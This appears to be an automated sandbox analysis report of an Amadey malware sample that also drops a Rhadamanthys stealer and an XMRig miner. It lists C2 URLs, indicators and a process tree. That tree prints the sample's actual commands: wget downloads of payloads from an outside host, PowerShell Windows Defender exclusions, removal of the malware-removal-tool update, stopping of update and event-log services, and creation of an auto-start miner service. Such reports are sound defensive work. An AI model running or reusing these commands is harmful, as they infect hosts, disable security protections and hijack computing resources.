amadey | e24cfa0f2969d1df115d09223a689d3f1a2c8badaec53e9d925641919a6400ef

Analysis

max time kernel
149s
max time network
123s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
07-08-2024 17:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Launcher.exe
Size

364KB
MD5

93fde4e38a84c83af842f73b176ab8dc
SHA1

e8c55cc160a0a94e404f544b22e38511b9d71da8
SHA256

fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03
SHA512

48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec
SSDEEP

6144:MpS9kEFKbITUvR8cy8dzQ7Lcf3Si96sfO+2RZrTql9unNrkYqliwrqH1JWP6f:Mp8KLBzQ7Lcf3SiQs2FTTql9unNrkvT2

Score

10^/10

amadey rhadamanthys xmrig 9f93a2 discovery evasion execution miner persistence stealer trojan upx

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

9f93a2

http://185.208.158.116

http://185.209.162.226

http://89.23.103.42

Attributes

install_dir
3bca58cece
install_file
Hkbsse.exe
strings_key
554ac8d4ec8b2a0ead6c958fdfed18cb
url_paths
/hb9IvshS01/index.php

/hb9IvshS02/index.php

/hb9IvshS03/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

plugin31849

description	pid	Process	procid_target
PID 1368 created 1220	1368	plugin31849	21

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

Processes:

resource	yara_rule
behavioral5/memory/2756-622-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral5/memory/2756-626-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral5/memory/2756-619-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral5/memory/2756-625-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral5/memory/2756-624-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral5/memory/2756-623-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral5/memory/2756-620-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral5/memory/2756-628-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral5/memory/2756-629-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
2616	powershell.exe
2696	powershell.exe
300	powershell.exe
2956	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

UPX packed file 17 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral5/files/0x000400000001dced-531.dat	upx
behavioral5/memory/3064-549-0x0000000140000000-0x0000000140E40000-memory.dmp	upx
behavioral5/memory/2712-601-0x0000000140000000-0x0000000140E40000-memory.dmp	upx
behavioral5/memory/2756-616-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral5/memory/2756-622-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral5/memory/2756-626-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral5/memory/2756-615-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral5/memory/2756-619-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral5/memory/2756-618-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral5/memory/2756-617-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral5/memory/2756-625-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral5/memory/2756-624-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral5/memory/2756-623-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral5/memory/2756-614-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral5/memory/2756-620-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral5/memory/2756-628-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral5/memory/2756-629-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

Processes:

flow	ioc
29	bitbucket.org
26	raw.githubusercontent.com
27	raw.githubusercontent.com
28	bitbucket.org

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid	Process
1732	powercfg.exe
2308	powercfg.exe
2944	powercfg.exe
2132	powercfg.exe
1240	powercfg.exe
1428	powercfg.exe
532	powercfg.exe
564	powercfg.exe

Drops file in System32 directory 4 IoCs

Processes:

powershell.exe2plugin28438powershell.exekuytqawknxye.exe

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	2plugin28438
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	kuytqawknxye.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

2plugin28438kuytqawknxye.exe

pid	Process
3064	2plugin28438
3064	2plugin28438
2712	kuytqawknxye.exe
2712	kuytqawknxye.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

kuytqawknxye.exe

description	pid	Process	procid_target
PID 2712 set thread context of 688	2712	kuytqawknxye.exe	108
PID 2712 set thread context of 2756	2712	kuytqawknxye.exe	111

Drops file in Windows directory 3 IoCs

Processes:

3plugin13200wusa.exewusa.exe

description	ioc	Process
File created	C:\Windows\Tasks\Hkbsse.job	3plugin13200
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe

Executes dropped EXE 14 IoCs

Processes:

Launhcer.exeLauncher.exewget.exewinrar.exeplugin31849wget.exewinrar.exe2plugin28438wget.exewinrar.exe3plugin13200Hkbsse.exekuytqawknxye.exe

pid	Process
1492	Launhcer.exe
2636	Launcher.exe
2532	wget.exe
816	winrar.exe
1368	plugin31849
2944	wget.exe
2344	winrar.exe
3064	2plugin28438
2584	wget.exe
1848	winrar.exe
1540	3plugin13200
772	Hkbsse.exe
472
2712	kuytqawknxye.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	Process
1924	sc.exe
2792	sc.exe
2596	sc.exe
1040	sc.exe
1444	sc.exe
2092	sc.exe
1140	sc.exe
1296	sc.exe
632	sc.exe
1720	sc.exe
2832	sc.exe
2796	sc.exe
2788	sc.exe
2384	sc.exe

Loads dropped DLL 20 IoCs

Processes:

Launcher.exepowershell.exeLauncher.exe3plugin13200

pid	Process
2312	Launcher.exe
2956	powershell.exe
2636	Launcher.exe
2636	Launcher.exe
2636	Launcher.exe
2636	Launcher.exe
2636	Launcher.exe
2636	Launcher.exe
2636	Launcher.exe
2636	Launcher.exe
2636	Launcher.exe
2636	Launcher.exe
2636	Launcher.exe
2636	Launcher.exe
2636	Launcher.exe
2636	Launcher.exe
2636	Launcher.exe
1540	3plugin13200
1540	3plugin13200
472

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

plugin31849wget.exe3plugin13200Launhcer.exewget.execmd.exepowershell.exepowershell.exewget.exedialer.exeHkbsse.exeLauncher.exewinrar.exewinrar.exewinrar.exeLauncher.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	plugin31849
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wget.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3plugin13200
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launhcer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wget.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wget.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dialer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Hkbsse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winrar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winrar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winrar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

wget.exewget.exewget.exe

pid	Process
2532	wget.exe
2944	wget.exe
2584	wget.exe

Modifies data under HKEY_USERS 6 IoCs

Processes:

dwm.exepowershell.exe

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 60fd2954f0e8da01	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exeplugin31849dialer.exe2plugin28438powershell.exekuytqawknxye.exepowershell.exedwm.exe

pid	Process
2956	powershell.exe
2956	powershell.exe
2956	powershell.exe
2696	powershell.exe
1368	plugin31849
1368	plugin31849
2268	dialer.exe
2268	dialer.exe
2268	dialer.exe
2268	dialer.exe
3064	2plugin28438
3064	2plugin28438
300	powershell.exe
3064	2plugin28438
3064	2plugin28438
3064	2plugin28438
3064	2plugin28438
3064	2plugin28438
3064	2plugin28438
3064	2plugin28438
3064	2plugin28438
3064	2plugin28438
3064	2plugin28438
3064	2plugin28438
3064	2plugin28438
3064	2plugin28438
3064	2plugin28438
2712	kuytqawknxye.exe
2712	kuytqawknxye.exe
2616	powershell.exe
2712	kuytqawknxye.exe
2712	kuytqawknxye.exe
2712	kuytqawknxye.exe
2712	kuytqawknxye.exe
2712	kuytqawknxye.exe
2712	kuytqawknxye.exe
2712	kuytqawknxye.exe
2712	kuytqawknxye.exe
2712	kuytqawknxye.exe
2712	kuytqawknxye.exe
2712	kuytqawknxye.exe
2712	kuytqawknxye.exe
2756	dwm.exe
2756	dwm.exe
2756	dwm.exe
2756	dwm.exe
2756	dwm.exe
2756	dwm.exe
2756	dwm.exe
2756	dwm.exe
2756	dwm.exe
2756	dwm.exe
2756	dwm.exe
2756	dwm.exe
2756	dwm.exe
2756	dwm.exe
2756	dwm.exe
2756	dwm.exe
2756	dwm.exe
2756	dwm.exe
2756	dwm.exe
2756	dwm.exe
2756	dwm.exe
2756	dwm.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedwm.exe

description	pid	Process
Token: SeDebugPrivilege	2956	powershell.exe
Token: SeDebugPrivilege	2696	powershell.exe
Token: SeDebugPrivilege	300	powershell.exe
Token: SeShutdownPrivilege	2308	powercfg.exe
Token: SeShutdownPrivilege	1732	powercfg.exe
Token: SeShutdownPrivilege	2944	powercfg.exe
Token: SeShutdownPrivilege	2132	powercfg.exe
Token: SeDebugPrivilege	2616	powershell.exe
Token: SeShutdownPrivilege	1240	powercfg.exe
Token: SeShutdownPrivilege	532	powercfg.exe
Token: SeShutdownPrivilege	1428	powercfg.exe
Token: SeShutdownPrivilege	564	powercfg.exe
Token: SeLockMemoryPrivilege	2756	dwm.exe

Suspicious use of FindShellTrayWindow 10 IoCs

Processes:

wget.exewinrar.exewget.exewinrar.exewget.exewinrar.exe3plugin13200

pid	Process
2532	wget.exe
816	winrar.exe
816	winrar.exe
2944	wget.exe
2344	winrar.exe
2344	winrar.exe
2584	wget.exe
1848	winrar.exe
1848	winrar.exe
1540	3plugin13200

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Launcher.exeLaunhcer.exepowershell.exeLauncher.exeplugin31849

description	pid	Process	procid_target
PID 2312 wrote to memory of 1492	2312	Launcher.exe	31
PID 2312 wrote to memory of 1492	2312	Launcher.exe	31
PID 2312 wrote to memory of 1492	2312	Launcher.exe	31
PID 2312 wrote to memory of 1492	2312	Launcher.exe	31
PID 2312 wrote to memory of 1492	2312	Launcher.exe	31
PID 2312 wrote to memory of 1492	2312	Launcher.exe	31
PID 2312 wrote to memory of 1492	2312	Launcher.exe	31
PID 2312 wrote to memory of 1492	2312	Launcher.exe	31
PID 2312 wrote to memory of 1492	2312	Launcher.exe	31
PID 1492 wrote to memory of 2956	1492	Launhcer.exe	32
PID 1492 wrote to memory of 2956	1492	Launhcer.exe	32
PID 1492 wrote to memory of 2956	1492	Launhcer.exe	32
PID 1492 wrote to memory of 2956	1492	Launhcer.exe	32
PID 1492 wrote to memory of 2956	1492	Launhcer.exe	32
PID 1492 wrote to memory of 2956	1492	Launhcer.exe	32
PID 1492 wrote to memory of 2956	1492	Launhcer.exe	32
PID 2956 wrote to memory of 2636	2956	powershell.exe	34
PID 2956 wrote to memory of 2636	2956	powershell.exe	34
PID 2956 wrote to memory of 2636	2956	powershell.exe	34
PID 2956 wrote to memory of 2636	2956	powershell.exe	34
PID 2956 wrote to memory of 2636	2956	powershell.exe	34
PID 2956 wrote to memory of 2636	2956	powershell.exe	34
PID 2956 wrote to memory of 2636	2956	powershell.exe	34
PID 2956 wrote to memory of 2636	2956	powershell.exe	34
PID 2956 wrote to memory of 2636	2956	powershell.exe	34
PID 2636 wrote to memory of 2696	2636	Launcher.exe	35
PID 2636 wrote to memory of 2696	2636	Launcher.exe	35
PID 2636 wrote to memory of 2696	2636	Launcher.exe	35
PID 2636 wrote to memory of 2696	2636	Launcher.exe	35
PID 2636 wrote to memory of 2696	2636	Launcher.exe	35
PID 2636 wrote to memory of 2696	2636	Launcher.exe	35
PID 2636 wrote to memory of 2696	2636	Launcher.exe	35
PID 2636 wrote to memory of 2532	2636	Launcher.exe	37
PID 2636 wrote to memory of 2532	2636	Launcher.exe	37
PID 2636 wrote to memory of 2532	2636	Launcher.exe	37
PID 2636 wrote to memory of 2532	2636	Launcher.exe	37
PID 2636 wrote to memory of 2532	2636	Launcher.exe	37
PID 2636 wrote to memory of 2532	2636	Launcher.exe	37
PID 2636 wrote to memory of 2532	2636	Launcher.exe	37
PID 2636 wrote to memory of 816	2636	Launcher.exe	40
PID 2636 wrote to memory of 816	2636	Launcher.exe	40
PID 2636 wrote to memory of 816	2636	Launcher.exe	40
PID 2636 wrote to memory of 816	2636	Launcher.exe	40
PID 2636 wrote to memory of 816	2636	Launcher.exe	40
PID 2636 wrote to memory of 816	2636	Launcher.exe	40
PID 2636 wrote to memory of 816	2636	Launcher.exe	40
PID 2636 wrote to memory of 1368	2636	Launcher.exe	41
PID 2636 wrote to memory of 1368	2636	Launcher.exe	41
PID 2636 wrote to memory of 1368	2636	Launcher.exe	41
PID 2636 wrote to memory of 1368	2636	Launcher.exe	41
PID 2636 wrote to memory of 1368	2636	Launcher.exe	41
PID 2636 wrote to memory of 1368	2636	Launcher.exe	41
PID 2636 wrote to memory of 1368	2636	Launcher.exe	41
PID 2636 wrote to memory of 2944	2636	Launcher.exe	42
PID 2636 wrote to memory of 2944	2636	Launcher.exe	42
PID 2636 wrote to memory of 2944	2636	Launcher.exe	42
PID 2636 wrote to memory of 2944	2636	Launcher.exe	42
PID 2636 wrote to memory of 2944	2636	Launcher.exe	42
PID 2636 wrote to memory of 2944	2636	Launcher.exe	42
PID 2636 wrote to memory of 2944	2636	Launcher.exe	42
PID 1368 wrote to memory of 2268	1368	plugin31849	44
PID 1368 wrote to memory of 2268	1368	plugin31849	44
PID 1368 wrote to memory of 2268	1368	plugin31849	44
PID 1368 wrote to memory of 2268	1368	plugin31849	44

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1220
- C:\Users\Admin\AppData\Local\Temp\Launcher.exe
  "C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2312
- - C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
    "C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1492
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2956
    - - C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
        
        "C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2636
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2696
      - C:\Users\Admin\AppData\Roaming\services\wget.exe
        
        "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition https://buscocurro.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:2532
      - C:\Users\Admin\AppData\Roaming\services\winrar.exe
        
        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:816
      - C:\Users\Admin\AppData\Roaming\services\plugin31849
        
        C:\Users\Admin\AppData\Roaming\services\plugin31849
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1368
      - C:\Users\Admin\AppData\Roaming\services\wget.exe
        
        "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition https://buscocurro.com/2/1 -P C:\Users\Admin\AppData\Roaming\services
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:2944
      - C:\Users\Admin\AppData\Roaming\services\winrar.exe
        
        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:2344
      - C:\Users\Admin\AppData\Roaming\services\2plugin28438
        
        C:\Users\Admin\AppData\Roaming\services\2plugin28438
        6⤵
        Drops file in System32 directory
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3064
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:300
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:1048
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        8⤵
        Drops file in Windows directory
        
        PID:1968
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:1040
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:1296
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:632
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        7⤵
        Launches sc.exe
        
        PID:1924
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        7⤵
        Launches sc.exe
        
        PID:1720
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1732
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2132
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2944
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2308
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "OZLCSUZD"
        7⤵
        Launches sc.exe
        
        PID:2832
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "OZLCSUZD" binpath= "C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe" start= "auto"
        7⤵
        Launches sc.exe
        
        PID:2796
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        7⤵
        Launches sc.exe
        
        PID:2788
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "OZLCSUZD"
        7⤵
        Launches sc.exe
        
        PID:2792
      - C:\Users\Admin\AppData\Roaming\services\wget.exe
        
        "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition https://buscocurro.com/3/1 -P C:\Users\Admin\AppData\Roaming\services
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:2584
      - C:\Users\Admin\AppData\Roaming\services\winrar.exe
        
        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:1848
      - C:\Users\Admin\AppData\Roaming\services\3plugin13200
        
        C:\Users\Admin\AppData\Roaming\services\3plugin13200
        6⤵
        Drops file in Windows directory
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:1540
        
        C:\Users\Admin\AppData\Local\Temp\3bca58cece\Hkbsse.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3bca58cece\Hkbsse.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:772
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1704
- C:\Windows\SysWOW64\dialer.exe
  "C:\Windows\system32\dialer.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:2268

C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe
C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe
1⤵
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2712
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:624
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Drops file in Windows directory
    PID:2992
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2384
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:1444
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2092
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2596
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:1140
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1240
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1428
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:532
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:564
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:688
- C:\Windows\system32\dwm.exe
  dwm.exe
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2756

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

